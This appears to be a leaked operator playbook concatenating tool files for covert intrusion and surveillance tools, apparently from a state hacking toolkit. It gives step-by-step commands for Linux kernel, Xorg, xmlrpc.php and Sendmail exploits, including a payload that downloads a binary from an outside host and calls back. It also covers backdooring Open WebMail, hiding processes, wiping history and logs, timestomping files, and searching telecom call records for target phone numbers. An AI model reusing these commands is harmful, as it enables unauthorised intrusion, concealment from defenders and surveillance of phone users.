## Could not enumerate objects associated with a tag.
## 13 LOADER_ERROR_READ_OBJECT
## Could not read object data or meta-data.
## 14 LOADER_ERROR_WRITE_OBJECT
## Could not write object data or meta-data.
## 15 LOADER_ERROR_LOAD_USER_MODULE_OBJECT
## Could not load a user module data object.
## 16 LOADER_ERROR_EXECUTE_OBJECT
## Could not execute an executable data object.
## 17 LOADER_ERROR_KERNEL_SHUTDOWN
## Could not unload existing kernel modules.
## 18 LOADER_ERROR_KERNEL_PLATFORM
## Payload does not contain any kernel modules for this platform.
## 19 LOADER_ERROR_KERNEL_INJECT
## Could not inject modules into the running kernel.
## 20 LOADER_ERROR_KERNEL_INVOKE
## Could not invoke a required kernel service.
## 21 LOADER_ERROR_PERSIST_ENABLE
## Could not enable persistence.
## 22 LOADER_ERROR_PERSIST_READ
## Could not read persistent executable.
## 23 LOADER_ERROR_HOSTID
## Hostid of system did not match the one stored in the archive.
## 24 LOADER_ERROR_EXECL
## Error calling execl(3) when invoking the 64-bit version of the Loader.
## 25 LOADER_ERROR_FORK
## Error calling fork(2) when invoking the 64-bit version of the Loader.
## 26 LOADER_ERROR_WAITPID
## Error calling waitpid(2) when invoking the 64-bit version of the Loader.
## 27 LOADER_ERROR_SIGACTION
## Error calling sigaction(2) when setting the Loader process signal handlers.
## 28 LOADER_ERROR_SIGADDSET
## Error calling sigaddset(2) when setting the Loader process signal handlers.
################################################################################
###
###
### END File user.tool.stoicsurgeon.COMMON
### (see also ../etc/user.tool.stoicsurgeon.COMMON)
###
### BEGIN File user.tool.dittlelight_hidelite.COMMON (see also ../etc/user.tool.dittlelight_hidelite.COMMON)
###
############################################################
# DITTLELIGHT (HIDELIGHT)
############################################################
### To run the unix oracle db scripts, you must do them outside of an INCISION process
### therefore, you can use DITTLELIGHT (HIDELITE) to unhide your nopen window
### You must run HIDELIGHT on a process with a parent PID of "1" so
### do a callback to your redirector and run hidelite on the callback window
### Hidelite
### Create a callback window
# On redirector:
-nrtun NOPEN_PORT
# On target:
-call REDIR_IP NOPEN_PORT
### upload the correct version of hidelite for sparc or linux in a temp directory:
mkdir /tmp/.scsi
-cd /tmp/.scsi
-put /current/bin/hidelite.sparc crond
# or
-put /current/bin/hidelite.linux crond
### If you were running oracle commands, you can now clean them up:
### Cleanup the logs created from the oracle scripts:
### ex:
# -ls -t /opt/mnt/oracle/product/9.2.0/rdbms/audit
# -rm <NEW_FILES>
# -touch /opt/mnt/oracle/product/9.2.0/rdbms/audit/ora_1473.aud /opt/mnt/oracle/
product/9.2.0/rdbms/audit
### Remove your working directory and -burn nopen when done with op
-cd /tmp
-rm .scsi
-lt /tmp
-burnBURN
###
### END File user.tool.dittlelight_hidelite.COMMON
### (see also ../etc/user.tool.dittlelight_hidelite.COMMON)
###
### BEGIN File user.tool.draftbagger.COMMON (see also ../etc/user.tool.draftbagger.COMMON)
###
##### DRAFTBAGGER #####
### Assumes have already talked to SNAT via SnatLp
### Search/replace commands
:%s/ROUTER_IP/ROUTER_IP/g
:%s/PROXY_IP/PROXY_IP/g
:%s/RADIUS_IP/RADIUS_IP/g
:%s/RANDOM_HIGH/RANDOM_HIGH/g
### These aren't really meant to be used as search/replace in this script, more
### placeholders for the example commands, but here are the commands anyway,
### commented out so you really shouldn't run them
#:%s/LOCAL_TUNNEL_COMMANDS_PORT/LOCAL_TUNNEL_COMMANDS_PORT/g
#:%s/NOPEN_PID/NOPEN_PID/g
#:%s/PARTIAL_MATCH_TARGS/PARTIAL_MATCH_TARGS/g
#:%s/EXACT_MATCH_TARGS/EXACT_MATCH_TARGS/g
### get the date of the current radius log on the radius server
-lt /var/log/radius/ # (find the most current, should be last file in list)
-lt /var/log/radius/<date> # (file needed is the acct.log file)
### Will check to make sure the log file exists, check to make sure the
### "-tunnel LOCAL_TUNNEL_COMMANDS_PORT udp" command was run, and then
### starts a "tail -f" on the logfile to constantly bring the file home,
### this gives you two pastables: a "-tunnel PORT udp" command to run on the
### radius server, and a "parse_rads.pl" one to run in a locally scripted window
### run the "-tunnel" (use the one spit out, the one below is an example) on
### the box that will be talking to SNAT
-tunnel LOCAL_TUNNEL_COMMANDS_PORT udp
### Below is an example command, will need to use the pastable spit out by
### "-gs parse_rads" for the current session, but some things will need to
### be added to the command spit out, i.e. -p/-P args (phone numbers), the
### -R arg (treat already downloaded data as real-time, i.e. set up initial
### rules based on it), the IP address of the proxy, and any other stuff to
### play with
###
### -N -a -i are filled in by -gs parserads. Others need to be added manually
PORT=LOCAL_TUNNEL_COMMANDS_PORT parse_rads.pl -NRADIUS_IP:NOPEN_PID -a127.0.0.1:
RANDOM_HIGH -i/current/down/HOSTNAME.RADIUS_IP/var/log/radius/CURRENT_DATE/acct.
log -p PARTIAL_MATCH_TARGS -P EXACT_MATCH_TARGS -R PROXY_IP
### Will ask for pager numbers, and ask for confirmation that a sufficiently
### up-to-date version of SNAT is being used, go ahead and confirm these
### Should be able to get other instructions for DRAFTBAGGER UI
### when Op is complete, in the DB command window, run the following to close out
### NOTE: ANSWER "no" TO THE PROMPT ASKING WHETHER TO KEEP THE SNAT
### FILTERS ACTIVE
diediedie
### Ctrl-C your "tail -f" command on RADIUS server, or kill the appropriate pid
### In a local window, you can use the scripts "closetunnel" and "dotunnel" to
### interact with a -tunnel listening on a port for commands rather than stdin
### (i.e. "-tunnel LOCAL_TUNNEL_COMMANDS_PORT udp")
### "dotunnel" will send all command line args to that port for -tunnel to get
### "closetunnel" has hard-coded "c 1 2 3 4 5 6 7", and then "q"...this will
### get the Nopen prompt back
# Examples:
dotunnel s
dotunnel l 1390 1.2.3.4 139
closetunnel
### CLOSE OUT THE REST OF THE OP AS YOU WOULD NORMALLY
###
### END File user.tool.draftbagger.COMMON
### (see also ../etc/user.tool.draftbagger.COMMON)
###
### BEGIN File user.tool.elgingamble.COMMON (see also ../etc/user.tool.elgingamble.COMMON)
###
#######################################
# ELGINGAMBLE
#######################################
### local exploit for the following operating system versions:
### Linux 2.6.13 - 2.6.17.4 and certain distros that contain a backport of the
### vulnerable functionality
### Local exploit for the public prctl core dump vulnerability in recent Linux kernels.
### It takes advantage of an input validation/logic error in the kernel to create
### a cron script that will spawn a root shell.
### OPSEC:
### vulnerability: public
### exploit: public
###
### CHECK IF TARGET IS VULNERABLE
###
### check OS (for Linux 2.6.13 - 2.6.17.4)
uname -a
### make sure crond is running:
ps -ef | grep crond
### check if you have READ permission on /etc/cron.d (WRITE is part of the vuln.):
-lt /etc/cron.d
### make sure you have EXECUTE permission on crontab:
which crontab
-lt /usr/bin/crontab
### check if there is a cron.allow or cron.deny that might hinder your success:
-lt /etc/cron*
-cat /etc/cron.allow
-cat /etc/cron.deny
###
### if the above checks pass, you can try running it:
### USAGE:
# elgingamble:
# -h (optional) Prints a help message
# -d (optional) Used to specify the system cron directory (defaults /etc/cron.d)
# -p (optional) Used to specify the core file prefix (defaults cron.PID)
# -s (optional) Used to specify a shell besides /bin/sh
# -t (optional) Used to specify the exploit timeout (defaults 5 minutes)
### upload to target:
-put /current/up/elgingamble eg
### within nopen, run it from within -shell
-shell
./eg
# You'll see the following messages, you must wait for the cronjob to run:
# can't set core limit, trying indirect
# crontab installed
# must do crontab -r when finished
# waiting for re-exec, ETA 60-120s
# after waiting for the cronjob, run the following and start a new noserver
# once you gain root access:
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
id
PATH=. sendmail
### CLEANUP:
crontab -l
crontab -r
-lt /etc/cron.d
-rm /etc/cron.d/core.PID
-rm eg sendmail
-lt
### LOGS:
-lt /var/log/cron
-tail /var/log/cron
###
### TROUBLESHOOTING
###
# Exploit fails with message "kernel not vulnerable". The kernel is not vulnerable
# to exploitation.
# Remedy:None
# Exploit fails with message "failed: indirect". The exploit tried and failed to
# have cron call it indirectly to bypass resource limitations. This can occur if
# the crontab program is not installed, could not be found, or is restricted through
# the use of cron.allow and cron.deny.
# Remedy: Make sure crontab is installed on the system and usable by the system
# user you use to run the exploit.
# Exploit fails with message "failed". The exploit was unable to elevate to root.
# This indicates that the cron command was never executed. One possible reason for
# failure is if the coredump created in the system cron directory is too small to
# contain a valid cron command. Other reasons could be that the cron directory
# is not accessible by non-privileged users, or the cron daemon is not running on the system.
# Remedy: Make sure the cron daemon is running and the user running the exploit
# has read access to the system cron directory. Also check the core file limit.
#
# Description: Any other failure message. Remedy: Make sure the default exploit parameters,
# such as cron directory and core file prefix, are valid for the target system.
# If not, rerun the exploit and specify the appropriate parameters on the comman
d line.
###
### END File user.tool.elgingamble.COMMON
### (see also ../etc/user.tool.elgingamble.COMMON)
###
### BEGIN File user.tool.enoltog.COMMON (see also ../etc/user.tool.enoltog.COMMON)
###
#######################################
# ENOLTOG
#######################################
### Software modification to the Open WebMail software to target specific users of interest.
### Used to insert a FOXACID/HUFFMUSH tag.
### Version 1 will target the first five users to login into the system.
### Version 2 will target specific users.
### NOTE: Due to the uniqueness of each target and the source code modification required,
### SUGGEST DEVELOPER BE PRESENT DURING INITIAL DEPLOYMENT TO TARGET!!!!!!
###
### OPSEC:
# anyone viewing the source file will be able to see the added code.
###
### LOCALLY do the following:
###
### make a backup copy
cd /current/up
cp /current/down/HOSTNAME//var/www/cgi-bin/openwebmail/openwebmail-main.pl /curr
ent/up/openwebmail-main.pl
### edit ##ONE## of the following files, depending on the deployment type:
### For openwebmail-main-first-five-users.pl:
#############################################
# change the "<5" to the correct number of users
# change the target tag in the gif line - should NOT reuse the same
# target tag on different projects!!!!
### next, edit the local copy of the original file, and insert the code from the above
### step in the correct places
vi /current/up/m
###
### On target, upload the modified openwebmail:
###
mkdir /tmp/.scsi
-cd /tmp/.scsi
-put openwebmail-main.pl m
-put openwebmail-test.pl o
###
### CLEANUP DIRECTORY:
###
-rm m
-cd ..
-rm .scsi
-ls -t
### TROUBLESHOOTING:
# Determine the MD5 digest of the user
echo -n <USERNAME> | md5sum
# Determine if showthread.php is executable
-ls /var/www/cgi-bin/openwebmail/openwebmail-main.php
# upload and run test script openwebmail-test.pl
-put /current/up/openwebmail-test.pl o
./o
# should see
1
2
# clean up results
###
### END File user.tool.enoltog.COMMON
### (see also ../etc/user.tool.enoltog.COMMON)
###
### BEGIN File user.tool.excelberwick.COMMON (see also ../etc/user.tool.excelberwick.COMMON)
###
#######################################
# EXCELBERWICK
#######################################
### remote exploit against xmlrpc.php on Unix platforms
###
### WILL REQUIRE LOCAL ELEVATION
### sybil location: CGI-BIN
### Exploits a vulnerability in the XML-RPC PHP script. The vulnerable
### file is used in a large number of web applications, such as Drupal,
### b2evolution, and TikiWiki. The vulnerability is the result of
### unsanitized data being passed directly to the eval() call
### in the parseRequest() function of the XML-RPC server
### OPSEC:
### vulnerability: public
### exploit: public
### Usage:
# ./xp_xmlrpc.pl
usage: ./xp_xmlrpc.pl -i<host> -d<dir/file> -c<commands to run>
-i <host/IP, ex: 127.0.0.1>
-d </directory/xmlrpc.php, ex: /drupal/xmlrpc.php>
-p <port, default: 80>
-o <turn off IDS mode>
-v <for virtual host: default -i>
-a <automatically exploit all known scripts. Very noisy.>
0: /xmlrpc.php
1: /blog/xmlrpc.php
2: /blog/xmlsrv/xmlrpc.php
3: /blogs/xmlsrv/xmlrpc.php
4: /drupal/xmlrpc.php
5: /phpgroupware/xmlrpc.php
6: /wordpress/xmlrpc.php
7: /xmlrpc/xmlrpc.php
8: /xmlsrv/xmlrpc.php
9: /b2/xmlsrv/xmlrpc.php
10: /b2evol/xmlsrv/xmlrpc.php
11: /community/xmlrpc.php
12: /blogs/xmlrpc.php
-c <commands to run>
Examples:
1) ./xp_xmlrpc.pl -i127.0.0.1 -d/drupal/xmlrpc.php -c"uname -a;ls -la;w"
2) ./xp_xmlrpc.pl -i127.0.0.1 -d/drupal/xmlrpc.php -c"(mkdir /tmp/.scsi;
cd /tmp/.scsi; /usr/bin/wget http://555.1.2.150:5555/sendmail -Osendmail;chmod +
x sendmail;D=-c555.1.2.150:9999 PATH=. sendmail) 2>/dev/null"
mx
:%s/TARGET_IP/TARGET_IP/g
:%s/WEB_PORT/WEB_PORT/g
:%s/NETCAT_PORT/NETCAT_PORT/g
:%s/REDIR_IP/REDIR_IP/g
:%s/NOPEN_PORT/NOPEN_PORT/g
'x
### Then check if vulnerable by running the "-a" option to exhaust all options
# WEB-PORT is usually '80' unless the target is using something else, or you
# choose to tunnel it differently
# redirector:
-tunnel
l WEB_PORT TARGET_IP
# local script window:
./xp_xmlrpc.pl -i127.0.0.1 -pWEB_PORT -a -c"w"
### Look through the output; a successful hit will be followed by
### the results of the command issued by the "-c" option, in the suggested case,
### the results of "w"
### Each unsuccessful version will be followed by "404 not found" errors
### If the previous command yielded a successful attempt, then run the exploit again
### but substitute the version that was successful instead of using "-a"
# on redirector:
-nrtun NOPEN_PORT
### Replace "VERSION" with the appropriate php script, then run exploit to upload and execute nopen:
### connect:
-nstun TARGET_IP
###
### TROUBLESHOOTING:
###
# Try this to get interactive windows (you'll type in one, and get output in the other):
mx
:%s/PORT1/PORT1/g
:%s/PORT2/PORT2/g
'x
# Local scripted window #1:
nc -l -vv -p PORT1
###
### CLEANUP:
###
# Logging directory depends on type of web software running on target (check -find):
# Try /var/log/httpd:
# access_log
# referer_log
# error_log
###
### END File user.tool.excelberwick.COMMON
### (see also ../etc/user.tool.excelberwick.COMMON)
###
### BEGIN File user.tool.dittoclass.COMMON (see also ../etc/user.tool.dittoclass.COMMON)
###
##### DITTOCLASS #####
### Search/replace commands
### OLD PKG NAME: if DC prev installed, name of pkg, if not then leave alone
### OLD DITTOCLASS DIR: if DC prev installed, directory where it was installed
### NEW PKG NAME: name of new DC installation package
### NEW DITTOCLASS DIR: directory where DC will be installed
:%s/OLD_PKG_NAME/OLD_PKG_NAME/g
:%s/OLD_DITTOCLASS_DIR/OLD_DITTOCLASS_DIR/g
:%s/NEW_PKG_NAME/NEW_PKG_NAME/g
:%s/NEW_DITTOCLASS_DIR/NEW_DITTOCLASS_DIR/g
### Check to see if DITTOCLASS already on target (if fails, not implanted).
### Make sure check for other implants too.
### NOTE: Must use "cat", "-cat" will not work
### Doing "cat /proc/OLD_PKG_NAME" will register you to see hidden resources
### If neither of the "cat" commands work and you think there is an old
### installation, the "ls" command below should still work, if not there is
### probably nothing there
cat /proc/listfiles
cat /proc/OLD_PKG_NAME
ls -la /OLD_DITTOCLASS_DIR/OLD_PKG_NAME
### After uninstall, in a NOPEN window, grep for the old package name
### and kill any of the processes associated with it
netstat -anlp | grep OLD_PKG_NAME
ps -ef | grep OLD_PKG_NAME
kill -9 OLD_PKG_NAME_PIDS
### Make sure unable to connect with hector if connected with hector before
# Use whatever command used to get on
cd /current/bin
hector .... # your previous hector command line
###
### Get a "before" picture of the device where /tmp resides
###
# find the device that is mounted on /tmp (ex.- /dev/hdb3) and make note;
# if /tmp does not have its own filesystem, use the device of "/"
df -k
# look at the perms of the DEVICE, then make note of the group id; typically should be "disk"
# ex: -ls /dev/hdb3
-ls <DEVICENAME>
# correlate the groupid to a digit by finding it in /etc/group, then save the numeric value
# ex: -grep disk /etc/group
-grep <GROUPNAME> /etc/group
###
### upload and execute
###
-put /current/up/exze exze
# run the script (within nopen, use -shell)
-shell
./exze
### A status code will show up while the program is running.
### The following value should indicate potential success: 0x000 <gid on device file>
### The <gid> should be the same as you found out from the initial checks
### MAKE NOTE OF THE VALUE REPORTED BACK ON THIS INITIAL ATTEMPT IN CASE OF FAILURE!!!
### Any value other than 0x000 is an error code (see other documentation)
### Wait about 5 minutes (for the cache flushing) and you should get a root prompt, then:
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
id
# start a new noserver
PATH=. crond
###
### IF AT FIRST YOU DON'T SUCCEED....... try, try..... the following in order:
###
### If you received an error that permissions didn't change, you may try again.
### Next, try using the -r option. This option will prevent the temporary shell
### file from being removed if there is an error so that the operator will have a chance
### to do the cache flushing manually.
-shell
./exze -r
### if successful, run the "unset"s from above - you have root and can cleanup
### If the 'permissions didn't change' error still happens, the flushing procedure
### will need to be performed manually before proceeding to the next step.
find / -type f -exec cat {} \; > /dev/null
### ONLY AFTER the 'find' completes, check the permissions of the shell file in /tmp:
### should be rws--x--- and owned by root
### DO NOT EXECUTE, OPEN, READ, OR WRITE TO THE SHELL FILE BEFORE THE EXPLOIT FINISHES
### AS IT MIGHT UNDO THE CHANGES MADE TO THE DISK!! THIS MEANS DO NOT DO AN LS
### ON THE FILE OR TOUCH IT IN ANY MANNER UNTIL THE EXPLOIT COMPLETES.
-lt /tmp
### if the permissions have changed, then manually attempt to get a root shell;
### the -d and -i options will attempt to perform the cleanup of the shell file in /tmp
### and reset the group perms of the DEVICE
-lt /tmp
-shell
/tmp/file<######> -d <DEVICE> -i <GID>
### if you don't get root by now, you probably won't
###
### CLEANUP
###
### no cleanup if successful the first time, however....
### there may be cleanup involved under the following conditions:
### the exploit did NOT work on the first attempt
### the exploit was aborted
### the connection to target was dropped
### check the group id of the DEVICE where /tmp resides;
### if the group is not the same as it was originally, set it to
### the gid echoed back in your INITIAL ATTEMPT (digit following 0x000)
### NOTE: if you didn't get root, you may not be able to chgrp the device
### but hopefully, the exploit will have set it to gid '0' to be
### less conspicuous than that of your user's gid
-lt /dev/<DEVICENAME>
chgrp <GID> /dev/<DEVICENAME>
-lt /dev
###
### END File user.tool.expitiatezeke.COMMON
### (see also ../etc/user.tool.expitiatezeke.COMMON)
###
### BEGIN File user.tool.englandbogy.COMMON (see also ../etc/user.tool.englandbogy.COMMON)
###
#######################################
# ENGLANDBOGY
#######################################
### local exploit against Xorg for the following versions:
### Xorg X11R7 1.0.1, X11R7 1.0, X11R6 6.9
### Includes the following distributions:
### MandrakeSoft Linux 10.2, Ubuntu 5.0.4, SuSE Linux 10.0,
### RedHat Fedora Core5, MandrakeSoft Linux 2006.0
### Fails-on - Xorg X11R7 1.0.2 and greater and less than Xorg X11R6 6.9.
### Requirements - Target needs to have the Xorg binary as SETUID root.
###
### Exploits the Xorg X server by allowing unprivileged users to load arbitrary modules
### OPSEC:
### vulnerability: public
### exploit: public
### Determine if vulnerable:
uname -a
### get Xorg version; should be one listed above:
Xorg -version
### see if Xorg is setuid root- should look similar to this (-rwsr-xr-x )
ls -la /usr/bin/Xorg
###
### END File user.tool.englandbogy.COMMON
### (see also ../etc/user.tool.englandbogy.COMMON)
###
### BEGIN File user.tool.earlyshovel.COMMON (see also ../etc/user.tool.earlyshovel.COMMON)
###
#########################################################
# EARLYSHOVEL
#########################################################
### publicly known vulnerability
### remote exploit available for linux RH7 running sendmail
###Supported targets:
### "ASPRH73": ASP Linux 7.3 or RedHat 7.3 running Sendmail 8.11.6
### "RH70": RedHat 7.0 running Sendmail 8.11.0
### "RH71": RedHat 7.1 running Sendmail 8.11.2
### "RH73": RedHat 7.3 running Sendmail 8.11.6
### requires valid user name ( 7.1 and 7.3)
### may also require valid domain for (7.3)
mx
:%s/REDIRECTOR_IP/REDIRECTOR_IP/g
:%s/TARGET_IP/TARGET_IP/g
:%s/TARGET_OS/TARGET_OS/g
:%s/USER_NAME/USER_NAME/g
:%s/DOMAIN/DOMAIN/g
:%s/RANDOM_PORT/RANDOM_PORT/g
`x
#banner mail
-scan mail TARGET_IP
# alternate way to banner
##on pitch
-tunnel
l 2525 TARGET_IP 25
###local scripted
telnet 127.0.0.1 2525
## after getting banner
helo DOMAIN
mail from: user@DOMAIN # use random user name
### may be getting rejected as spam???
$ ./eash.py -?
usage:
/current/bin/earlyshovel/eash.py [options]
options
--atimeout seconds (default = 30)
Authentication timeout (in seconds)
--cip IPAddress (default = 127.0.0.1)
Callback IP address
--clport port
Local callback port
--cport port
Callback port
--ctimeout seconds (default = 30)
Callback timeout (in seconds)
--domain domainName
Domain name of sender
--exec filename
File to exec on successful upload
-? | --help
Print the usage message
--recipient emailAddress (default = root)
Email recipient
--target target
Target OS
--tip IPAddress (default = 127.0.0.1)
Target IP address
--tmpnam filename
Remote name of the uploaded file (of the form /tmp/fileXXXXXX)(def=filekdBtDF)
--tport port (default = 25)
Target port
--upload filename
File to upload
Supported targets:
"ASPRH73": ASP Linux 7.3 or RedHat 7.3 running Sendmail 8.11.6
"RH70": RedHat 7.0 running Sendmail 8.11.0
"RH71": RedHat 7.1 running Sendmail 8.11.2
"RH72": RedHat 7.2 running Sendmail 8.11.6
### REDIRECTION
-tunnel
l 2525 TARGET_IP 25
r RANDOM_PORT
### LOCAL WINDOW: UPLOADS NOPEN AUTOMATICALLY - as of VERSION 2.4.0
cd /current/bin/earlyshovel
./eash.py --tip 127.0.0.1 --tport 2525 --cip REDIRECTOR_IP --cport RANDOM_PORT
--recipient USER_NAME --target TARGET_OS --domain DOMAIN --exec /current/bin/no
client --upload /current/up/morerats/noserver-3.0.3.1-i586.pc.linux.gnu.redhat-5
.0
-OR-
### LOCAL WINDOW:MANUAL UPLOAD of NOPEN
cd /current/bin/earlyshovel
./eash.py --tip 127.0.0.1 --tport 2525 --cip REDIRECTOR_IP --cport RANDOM_PORT
--recipient USER_NAME --target TARGET_OS
./eash.py --tip 127.0.0.1 --tport 2525 --cip REDIRECTOR_IP --cport RANDOM_PORT
--recipient USER_NAME --target TARGET_OS --domain DOMAIN
### you will get an interactive root shell
unset HISTFILE
unset HISTFILESIZE
unset HISTSIZE
id
pwd
w
-get /var/spool/mail/USER_NAME
#locally
cp /current/down/hostname.IP/var/spool/mail/USER_NAME /current/up/t
cd /current/up/t
#remove email from t
-put /current/up/t t
#target window
#if it looks good
cat t > /var/spool/mail/USER_NAME
# touch file to a "good" date
touch -t YYMMDDHHMM.ss /var/spool/mail/USER_NAME
#does user have a home dir
grep USER_NAME /etc/passwd
# look for users home dir and list it
-lt ?/?/USER_NAME
## look for .procmail or .forward files
cat files if there....
###
### END File user.tool.earlyshovel.COMMON
### (see also ../etc/user.tool.earlyshovel.COMMON)
###
### BEGIN File user.tool.curserazor.COMMON (see also ../etc/user.tool.curserazor.COMMON)
###
################ CURSERAZOR #########################
############### PARSING #######################################################
############
### vi Search/Replace commands ###
### ProjectName - self explanatory
### Date field - today's date, used for output files
### Host - hostname of the box (not IP address)
### Cryptkey - encryption key (use output from below md5sum command)
md5sum /current/down/tcpdump.raw
mx
:%s/PROJECTNAME/PROJECTNAME/g
:%s/DDMonYY/DDMonYY/g
:%s/HOST/HOST/g
:%s/CRYPTKEY/CRYPTKEY/g
'x
### Save the encryption key locally:
echo CRYPTKEY > /current/down/cryptkey.curserazor.DDMonYY
####### Prepare files containing numbers to search for:
# if files containing the numbers to search available:
mkdir /current/down/argfiles
cd /current/down/argfiles
mz
cp /mnt/zip*/arg* /current/down/argfiles
#or
cp /mnt/zip*/PROJECTNAME/arg* /current/down/argfiles
ls -altr
##### Upload the encrypted phone list as awk, modify each parser command to have the
##### correct directory and date range of files to parse, then run the parser:
##### NOTE: MUST CORRELATE NUMBERS IN ENCRYPTED TASKING FILENAMES (i.e. argfile1.enc)
##### TO OUTPUT FILENAMES (cdrhits*.enc1, cdrhits*.enc1.more, cdrhits*.enc1.more2, etc.)
##### NOTE2: GO FROM MOST RECENT TIME TO (PROBABLY CURRENT DATE) AS FAR BACK AS TIME ALLOWS
############ argfile 1
-put /current/down/argfiles/argfile1.enc awk
-setenv B=-k CRYPTKEY -z "find /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/ -nam
e '*2007103*GCDR' -print" -P ./awk
nscd >T:/current/down/cdrhits.curserazor.HOST.DDMonYY.enc1
-beep 15
### Run again if needed for same tasking
-put /current/down/argfiles/argfile1.enc awk
-setenv B=-k CRYPTKEY -z "find /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/ -nam
e '*2007102[89]*GCDR' -print" -P ./awk
./nscd >T:/current/down/cdrhits.curserazor.HOST.DDMonYY.enc1.more
-beep 15
############ argfile 2
-put /current/down/argfiles/argfile2.enc awk
-setenv B=-k CRYPTKEY -z "find /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/ -nam
e '*2007103*GCDR' -print" -P ./awk
nscd >T:/current/down/cdrhits.curserazor.HOST.DDMonYY.enc2
-beep 15
### Run again if needed for same tasking
-put /current/down/argfiles/argfile2.enc awk
-setenv B=-k CRYPTKEY -z "find /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/ -nam
e '*2007102[89]*GCDR' -print" -P ./awk
./nscd >T:/current/down/cdrhits.curserazor.HOST.DDMonYY.enc2.more
-beep 15
############ argfile 3
-put /current/down/argfiles/argfile2.enc awk
-setenv B=-k CRYPTKEY -z "find /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/ -nam
e '*2007103*GCDR' -print" -P ./awk
nscd >T:/current/down/cdrhits.curserazor.HOST.DDMonYY.enc2
-beep 15
### Run again if needed for same tasking
-put /current/down/argfiles/argfile2.enc awk
-setenv B=-k CRYPTKEY -z "find /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/ -nam
e '*2007102[89]*GCDR' -print" -P ./awk
./nscd >T:/current/down/cdrhits.curserazor.HOST.DDMonYY.enc2.more
-beep 15
######
###### survey mode:
######
### checks for IMEIs that have more than one IMSI associated with it:
### to limit amount of memory used, replace "-x" with "-X numberBytes"
-setenv B=-k CRYPTKEY -z "find /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/ -nam
e '*2007102[89]*GCDR' -print" -x
./nscd >T:/current/down/cdrhits.curserazor.HOST.DDMonYY.enc.surveyIMEI
### generates a list of Cell IDs associated with each MSC address:
### to limit amount of memory used, replace "-y" with "-Y numberBytes"
-setenv B=-k CRYPTKEY -z "find /ImE/data05_loc/DATA_5.0/OUTPUT/MSC/ARCHIVE/ -nam
e '*2007102[89]*GCDR' -print" -y
./nscd >T:/current/down/cdrhits.curserazor.HOST.DDMonYY.enc.surveyMSC
######
##### when it's done running, decrypt the file (-d -c options)
######
cd /current/down
ls -latr cdrhits*enc*
# to decrypt individually:
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.curserazor.HOST.DDMonYY.enc1 -
o cdrhits.curserazor.HOST.DDMonYY.txt1 -k CRYPTKEY -d -c
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.curserazor.HOST.DDMonYY.enc2 -
o cdrhits.curserazor.HOST.DDMonYY.txt2 -k CRYPTKEY -d -c
#####
##### clean up
#####
-rm nscd awk
-lt
-cd /tmp
-lt
w
ps -ef | sort
-lt /
-burnBURN
###
### END File user.tool.curserazor.COMMON
### (see also ../etc/user.tool.curserazor.COMMON)
###
### BEGIN File user.tool.cursehappy.preversion4.COMMON (see also ../etc/user.tool.cursehappy.preversion4.COMMON)
###
################ CURSEHAPPY #########################
############### PARSING #######################################################
############
### vi Search/Replace commands ###
### ProjectName - self explanatory
### Date field - today's date, used for output files
### Rec type - record type correlates with ProjectName, valid values: eh, ls, ss, wb
### Host - hostname of the box (not IP address)
### Cryptkey - encryption key (use output from below md5sum command)
md5sum /current/down/tcpdump.raw
mx
:%s/PROJECTNAME/PROJECTNAME/g
:%s/DDMonYY/DDMonYY/g
:%s/RECTYPE/RECTYPE/g
:%s/HOST/HOST/g
:%s/CRYPTKEY/CRYPTKEY/g
'x
### Save the encryption key locally:
echo CRYPTKEY > /current/down/cryptkey.cursehappy.DDMonYY
####### Prepare files containing numbers to search for:
# if files containing the numbers to search available:
mkdir /current/down/argfiles
cd /current/down/argfiles
mz
cp /mnt/zip*/arg* /current/down/argfiles
#or
cp /mnt/zip*/PROJECTNAME/arg* /current/down/argfiles
ls -altr
# isbapro1 10.5.7.51
# nothing new
-lt /u01/product_evdp/evident/data_store/collect
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc | head -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc | tail -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_khi01 | head -
10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_khi01 | tail -
10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_isb01 | head -
10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_isb01 | tail -
10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_lhr01 | head -
10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_lhr01 | tail -
10
-lt /u03/archive/collect
# newer stuff
ls -latr /u03/archive/collect/siemens_msc_isb01 | head -10
ls -latr /u03/archive/collect/siemens_msc_isb01 | tail -10
ls -latr /u03/archive/collect/siemens_msc_isb01 | wc -l
# old stuff:
ls -latr /u03/archive/collect/siemens_msc_khi01 | head -10
ls -latr /u03/archive/collect/siemens_msc_khi01 | tail -10
########################## editionhaze:
ls -latr /u06/saba/CDR/out/MS* | head -10
ls -latr /u06/saba/CDR/out/MS* | tail -10
ls -latr /u06/saba/CDR/out/MS* | wc -l
########################## liquidsteel:
########################## sicklestar:
### magnum: CURSEHAPPY not working on all SS .usd files :-(
### Try these first, should be all of them in one spot
ls -latr /usd_archive/mc_storage/*usd | head -10
ls -latr /usd_archive/mc_storage/*usd | tail -10
### If none in previous ones...
ls -latr /sys1/var/billing/out_coll/*usd | head -10
ls -latr /sys1/var/billing/out_coll/*usd | tail -10
ls -latr /sys1/var/alcatel/out_coll/*usd | head -10
ls -latr /sys1/var/alcatel/out_coll/*usd | tail -10
ls -latr /sys1/var/billing/msc_is2 | tail -20
########################## CURSEHAPPY #########################################
###############
################################################################################
###############
### Now, encrypt the ascii list...first make sure you have the encryption tool:
which cryptTool.v1.0.Linux2.4.18-14.targetdl
### If cryptTool not in PATH, change your PATH or insert full path in command
### to encrypt one at a time...skip to next comment to encrypt all at once:
cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile1.txt -o argfile1.enc -k CRYPTK
EY -b
